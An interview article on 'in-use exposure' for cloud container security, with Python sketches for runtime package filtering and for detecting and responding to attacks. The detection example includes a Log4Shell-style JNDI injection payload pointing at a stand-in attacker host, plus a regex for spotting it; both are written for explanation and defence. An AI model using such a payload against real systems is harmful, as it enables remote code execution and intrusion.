In-use exposure – a probability-based approach to cloud container flaws?

Don't get distracted by the size of the potential problem – focus on what's most likely.
28 February 2023

In-use exposure – bringing clarity to confusion.

In Part 1 of this article, we spoke to Michael Isbitski, Director of Cybersecurity Strategy at Sysdig, about a rising tide of flaws in cloud containers, and the resulting security risk with which an increasingly cloud-native market was having to contend. Sysdig’s Kubernetes report for 2023 suggested that there were flaws in 87% of software containers and that 90% of such containers were not yet using zero trust techniques. After explaining some of the reasons for this rise in vulnerabilities – including a significant increase in the number of containers that exist for only very short periods, and business pressures forcing companies to accept a degree of risk in their software containers – Michael told us about the latest idea for finding and dealing with potential threats in this rapidly moving environment: in-use exposure.

We asked him to explain what that was and how it worked.

THQ:

So how does in-use exposure help, given the size and potential difficulty of this issue?

MI:

OK – as we mentioned in Part 1, businesses are finding themselves caught between a rock and a hard place with container images. They want to, and probably should, scan everything, because attackers are getting extremely adept at putting malicious code into containers. But there’s just such a volume of code to check that it would be counterproductive for businesses to spend the time scanning absolutely everything to minimize their risk. They’ve come to accept some degree of risk in using assets potentially picked up from public registries.

Minimize risk to eradicate flaws.

So the question becomes one of how you minimize that risk, and maximize the likelihood of finding and eradicating flaws and vulnerabilities.

How do you do that? Visibility is a largely missing piece of the puzzle. But again, if you try to get visibility over everything, with operations that are potentially huge and fast-moving, you aren’t actually getting the most effective solution – by the time you can see everything, something else is already happening.

That’s where in-use exposure comes in. In-use exposure, as the name suggests, shows you what’s actually in use at any given time. The logic, of course, is that if things aren’t in use, they’re unlikely to be in danger at that moment. We’re looking at containers as they’re running, so we know how things are manifesting in your environment, and then we can tell you where the potential dangers are, in actual runtime.

So you might start with 100 packages and find you’re really only using two, and you can zero in on those to address the problem. It’s a combination of the need to analyze and the need for speed – focus on what’s running, rather than trying to look into everything, and you immediately cut down the chances of missing real dangers.
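(To make that concrete, here’s a minimal, hypothetical sketch of the kind of filtering in-use exposure implies. It is not Sysdig’s implementation – the package names, CVE IDs, and runtime snapshot are invented for illustration.)

```python
# Illustrative sketch of the in-use exposure idea: start from every package in the
# container image, then keep only the vulnerable packages that are actually loaded
# at runtime. All names and CVE IDs below are hypothetical.

# Every package shipped in the container image, mapped to its known CVEs
image_packages = {
    "liblog-utils": ["CVE-2021-0001"],
    "libxml-parse": ["CVE-2022-0002"],
    "libcrypto-extra": [],
    # ... imagine ~100 entries in a real image
}

# Packages a runtime agent actually observed being loaded by running processes
in_use_packages = {"liblog-utils", "libcrypto-extra"}


def in_use_exposure(image_pkgs, runtime_pkgs):
    """Return only the vulnerable packages that are both present and in use."""
    return {
        name: cves
        for name, cves in image_pkgs.items()
        if cves and name in runtime_pkgs
    }


if __name__ == "__main__":
    exposed = in_use_exposure(image_packages, in_use_packages)
    print(f"{len(exposed)} of {len(image_packages)} packages need attention now:")
    for name, cves in exposed.items():
        print(f"  {name}: {', '.join(cves)}")
```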

A matter of focus.

THQ:

So it’s a rapid-focus tool that lets you see the dangers in time to do something about them. Which, when 87% of containers have flaws, has to be useful. But seeing is one thing, and dealing is another. What should companies do when their in-use exposure picture points to a container and yells “This thing is hostile!”?

MI:

Mitigation depends on two things: firstly, focusing on things that are truly exploitable and in use, and secondly, having a threat detection engine like Falco, which is open source but is also the foundation of a commercial offering. You need that engine to detect if something goes awry. Say you have a logging library that’s known to be vulnerable. That could be in your app code, or it could be in the infrastructure. You’d then want to watch for an attacker trying to inject malicious data through the logging mechanism to take advantage of that vulnerability. We would see that event and be able to alert on it, and then we could block communication and terminate the container.
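(As a rough illustration of that detect-and-respond flow, here’s a conceptual sketch in Python. It is not Falco’s actual rule syntax or response API – the event fields, payload signature, and responder hooks are invented for the example.)

```python
# Conceptual sketch of a detect-alert-respond loop: watch data passing through a
# known-vulnerable logging path, alert on a suspicious payload, then block traffic
# and terminate the container. Everything here is a hypothetical placeholder.

import re
from dataclasses import dataclass

# Crude signature for malicious lookup strings injected via logging, in the spirit
# of a Log4Shell-style attack pattern (illustrative, not a production detection rule)
SUSPICIOUS_LOG_PAYLOAD = re.compile(r"\$\{jndi:", re.IGNORECASE)


@dataclass
class RuntimeEvent:
    container_id: str
    process: str
    logged_data: str


def handle_event(event: RuntimeEvent, responder) -> None:
    """Alert on a suspicious event, then apply whichever mitigations the org has chosen."""
    if SUSPICIOUS_LOG_PAYLOAD.search(event.logged_data):
        responder.alert(
            f"Possible exploit of vulnerable logging library in "
            f"container {event.container_id} (process {event.process})"
        )
        # How far to go – block, terminate, or alert only – is a per-organization decision
        responder.block_network(event.container_id)
        responder.terminate(event.container_id)


class PrintResponder:
    """Stand-in responder that just prints the actions it would take."""

    def alert(self, message):
        print("[ALERT]", message)

    def block_network(self, container_id):
        print(f"[ACTION] blocking network for {container_id}")

    def terminate(self, container_id):
        print(f"[ACTION] terminating container {container_id}")


if __name__ == "__main__":
    evt = RuntimeEvent("web-7f2a", "java", "user-agent: ${jndi:ldap://attacker.example/a}")
    handle_event(evt, PrintResponder())
```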

Obviously, exactly how they mitigate is up to each individual organization, and they’ll take different approaches because actions like container termination will have different production impacts for each of them – but that’s the state of play in the world of runtime security.

Runtime intelligence.

The thing we’re focusing on is delivering that runtime intelligence, because companies everywhere are saying they see vulnerabilities they can’t address – all the third-party libraries and open source apps and so on make it practically impossible to address and fix every vulnerability out there. But with runtime intelligence, you can tell which libraries you’re actually using at runtime and cut your vulnerability count down from hundreds or even thousands to a much smaller, more manageable handful.

THQ:

Focusing down from the massively unmanageable to the credibly manageable?

Risky business.

MI:

Exactly. It’s not about solving the world, it’s about focusing the world down into what might actually be problematic, so companies can legitimately handle the vulnerabilities they actually have at any given point.

Ultimately, the CISO of the company has to make decisions about risk, and the nature of the modern business world is that there are always going to be bugs and vulnerabilities. So what do they do? Runtime intelligence helps shrink that impossibly huge problem down to something on which they can take credible business decisions.

THQ:

The world’s never going to be perfect, but we have to live in it anyway, so here’s a tool that makes it manageable? Here’s something that reduces the risk to something that can be managed?

MI:

Exactly – the whole thing is about risk management. Risk is inherent; there’s always going to be risk. But it’s about doing as much as possible to reduce that risk to a point where your business decisions are credible and data-driven. And that’s where in-use exposure can make a big difference.